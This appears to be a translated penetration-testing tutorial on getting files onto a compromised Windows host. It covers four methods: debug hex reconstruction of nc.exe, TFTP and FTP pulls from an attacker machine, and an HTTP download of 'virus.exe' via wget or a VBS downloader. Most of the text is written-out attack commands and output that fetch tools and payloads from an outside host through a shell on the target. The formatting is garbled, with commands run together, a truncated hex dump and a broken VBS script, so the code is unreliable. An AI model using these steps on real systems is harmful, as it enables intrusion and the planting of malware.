Analysis on the four pose of uploading files to the target system in penetration testing

Analysis on the four pose of uploading files to the target system in penetration testing
Windows debug Method

Windows has a program called debug, which can convert the hexadecimal machine code into executable files. In Windows, the debug method can first convert the file into a hexadecimal system, then echo the file on the target system through a non-interactive shell, and finally use debug to convert the hexadecimal system and execute it. In Kali, a program named exe2bat is located in/usr/share/windows-binaries.

We can run it like this

root@kali:/usr/share/windows-binaries# wine exe2bat.exe nc.exe nc2.txtFinished: nc.exe > nc2.txtroot@kali:/usr/share/windows-binaries#

This command generates a txt file with the following content:

echo 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 00 a3 00 47 65 74 43 50 49 6e 66 6f 00 9d 00 47 65 74 41 43 50 00 00 09 01 47 65 74 4f 45 4d 43 50 00 00 1e 00 43 6f 6d 70 61 72 65 53 74 72 69 6e 6$echo e e780 >>123.hexecho 6c 65 00 00 19 02 53 65 74 46 69 6c 65 50 6f 69 6e 74 65 72 00 00 2b 01 47 65 74 53 74 72 69 6e 67 54 79 70 65 41 00 00 2e 01 47 65 74 53 74 72 69 6e 67 54 79 70 65 57 00 00 16 01 47 65 74 50 72 6f 63 41 6$echo e e800 >>123.hexecho 47 65 74 4e 75 6d 62 65 72 4f 66 43 6f 6e 73 6f 6c 65 49 6e 70 75 74 45 76 65 6e 74 73 00 31 00 43 72 65 61 74 65 46 69 6c 65 41 00 10 02 53 65 74 45 6e 64 4f 66 46 69 6c 65 00 00 8d 01 4c 43 4d 61 70 53 7$echo e e880 >>123.hexecho 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0$echo e e900 >>123.hexecho  >>123.hexecho r cx >>123.hexecho e800 >>123.hexecho w >>123.hexecho q >>123.hexdebug<123.hexcopy 1.dll nc.exe

Then, copy all the content in the document and paste it into the Shell window.

0C96:E8E0  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.000C96:E8E8  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.000C96:E8F0  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.000C96:E8F8  00.00   00.00   00.00   00.00   00.00   00.00   00.00   00.000C96:E900  EC.     0E.     AC.-e e9000C96:E900  EC.EC   0E.e    AC.ac-r cxCX 0000:e800-wWriting 0E800 bytes-qC:\TRANSF~1>

In this way, our files will appear in the remote directory.

21/10/2015  22:44    

. 21/10/2015 . 21/10/2015 59.392 1.DLL 21/10/2015 184.270 123.hex 21/10/2015 59.392 nc.exe TFTP Method

TFTP is a protocol that uses UDP data packets to send and receive data between two machines on the network. It can be used to help attackers upload files to the target machine. Note that TFTP uses UDP data packets, so it is not suitable for sending large files because UDP lacks the integrity verification mechanism.

You can install a lightweight Python TFTP server as follows:

# apt-get install git && git clone git://github.com/msoulier/tftpy.git

Create a folder for storing the uploaded files and use chmod to grant the folder 777 permission. Then you can run the TFTP server.

# cd tftpy# python setup.py install

Run the server

# Cd bin # python tftpy_server.py-r/your folder

Run the following command on the target machine to obtain the file to be uploaded.

C:\TRANSF~1>tftp -i 192.168.11.70 get nc.exetftp -i 192.168.11.70 get nc.exeC:\TRANSF~1>

FTP method

Another very useful way to upload files is to use the FTP server. Because FTP transfers data over TCP, it performs integrity verification, so you can upload large files. We can use an FTP server like vsftpd on Linux.

# apt-get install vsftpd

After vsftpd is installed, Edit/etcvsftpd.confFile, cancel the commented local_enable and write_enable, and restart the service to upload the file.

To use a non-interactive script to upload files to the target machine, we only need to write the following commands into the Shell window. Below we assume that the FTP user name and password are both ftp.

C:\WINDOWS\system32>echo open 192.168.11.70 21> ftp.txtC:\WINDOWS\system32>echo ftp>> ftp.txtC:\WINDOWS\system32>echo bin >> ftp.txtC:\WINDOWS\system32>echo ftp>> ftp.txtC:\WINDOWS\system32>echo GET nc.exe >> ftp.txtC:\WINDOWS\system32>echo bye >> ftp.txtC:\WINDOWS\system32>ftp -s:ftp.txt

In this way, the file will appear on the target system.

HTTP Method

In penetration testing, the target host I often face is a Unix-like system. In this case, it is very easy to create an HTTP server and download it using the wget command. Windows systems do not have native download tools such as wget,/usr/share/windows-binariesDirectory, there is a tool named wget.exe that can run wget on windows.

Apache2 can be used for HTTP servers.

# apt-get install apache2

Move files/var/wwwRun the following wget command on the target system.

C:\TRANSF~1>wget.exe http://192.168.11.16/virus.exewget.exe http://192.168.11.16/virus.exe–23:34:27–  http://192.168.11.16/virus.exe=> `virus.exe’Connecting to 192.168.11.16:80… connected.HTTP request sent, awaiting response… 200 OKLength: 73,802 [application/x-msdos-program]0K ………. ………. ………. ………. ………. 69%    4.88 MB/s50K ………. ………. ..                              100%   21.55 MB/s23:34:27 (7.04 MB/s) – `virus.exe’ saved [73802/73802]C:\TRANSF~1>

Another way to run wget like a Windows Command is to use the following script. This non-interactive script can simply echo the content into the file.

‘Barabas pure vbs downloader – tested on XP sp2‘Microsoftfixedadodbstreambutguesswhat‘(c)dec 2004‘First argument = complete url to download‘Second Argument = filename you want to save‘thnks to http://www.ericphelps.com/scripting/samples/BinaryDownload/‘‘v2 – now includes proxy support for the winhttp request stuffstrUrl = WScript.Arguments.Item(0)StrFile = WScript.Arguments.Item(1)‘WinHttpRequest proxy settings.Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0Const HTTPREQUEST_PROXYSETTING_DIRECT = 1Const HTTPREQUEST_PROXYSETTING_PROXY = 2219src=”http://s.wordpress.com/wp-Dim http, varByteArray, strData, strBuffer, lngCounter, fs, tsErr.ClearSet http = NothingSet http = CreateObject(“WinHttp.WinHttpRequest.5.1”)If http Is Nothing Then Set http =CreateObject(“WinHttp.WinHttpRequest”)If http Is Nothing Then Set http =CreateObject(“MSXML2.ServerXMLHTTP”)If http Is Nothing Then Set http = CreateObject(“Microsoft.XMLHTTP”)‘ comment out next line if no proxy is being used‘ and change the proxy to suit ur needs -duhhttp.SetProxy HTTPREQUEST_PROXYSETTING_PROXY, “web-proxy:80”http.Open “GET”, strURL, Falsehttp.SendvarByteArray = http.ResponseBodySet http = NothingstrBuffer = “”strData = “”Set ts = fs.CreateTextFile(StrFile, True)Set fs = CreateObject(“Scripting.FileSystemObject”)For lngCounter = 0 to UBound(varByteArray)ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))Nextts.Close